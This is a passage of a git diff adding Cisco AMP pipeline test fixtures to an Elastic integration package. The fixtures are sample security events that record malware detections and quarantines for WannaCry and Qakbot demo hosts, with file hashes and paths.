"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419204901661835000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": 
"6419204897366867976",
+ "event_type_id": 2164260880
+ }
+ },
+ "tags": [
+ "preserve_original_event"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log
new file mode 100644
index 00000000000..9842f3cbe93
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log
@@ -0,0 +1,49 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. 
It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy 